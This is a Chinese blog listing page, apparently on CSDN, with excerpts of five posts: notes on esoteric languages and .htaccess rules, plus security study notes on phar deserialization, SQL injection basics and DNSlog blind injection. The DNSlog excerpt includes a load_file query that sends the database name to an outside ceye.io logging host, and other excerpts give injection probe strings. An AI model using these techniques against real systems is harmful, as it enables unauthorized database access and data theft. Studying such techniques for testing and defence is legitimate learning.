- 博客(5)
- 收藏
- 关注
RSS订阅原创 奇葩语言
无聊看看奇葩语言开开眼界Brainfuck:只有: ><±.[]Ook:猩猩语言??Ook. Ook? Ook!Malbolge:hello world(=<#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?=*z]Kw%oG4UUS0/@-ejc(:'8dcow全部都是mooINTERCAL:使用“READ OUT”,“IGNORE”,...
2019-07-13 12:25:31
213
原创 htaccess
order deny,allow(中间只能有一个逗号,有空格都会出错) 解释:先检查禁止设定,没有禁止的全部允许deny from all 两个一起用,全部禁止同样可以order allow,denyallow from all禁止访问deny from all 例如deny from .*domain.com限制含有domain.com的访问网站allow from 192.1...
2019-07-13 12:17:50
394
原创 phar
使用phar 在反序列化,和文件包含里面使用。首先是反序列化。利用条件可以文件上传,文件函数的参数可以控制,要有魔术方法作为跳板。首先使用内置的 Phar 来创建phar 文件,然后上传,找到可以操控的文件函数,比如这个$filename = ‘phar://phar.phar/1dasda.txt’;file_get_contents($filename); 在创建phar文件的时候在里...
2019-07-10 22:59:50
434
原创 dnslog的sql注入
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...
2019-07-09 23:57:38
231
原创 学习 sql注入的小结
基础在?id= 后面加’ 或 " 或 and1=1 and1=2字符型报错了,加 --+或)–+或))–+等 使它显示正确,要注意的是:如果代码是select * from 。。。where id=($id) 时没有报错时和数字型注入的情况一样,有报错的话就容易更判断,没有就再试试显示报错且显示出列的情况下:二分法order by 显示列数union select 列数 ; 在显...
2019-05-07 13:28:08
205
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人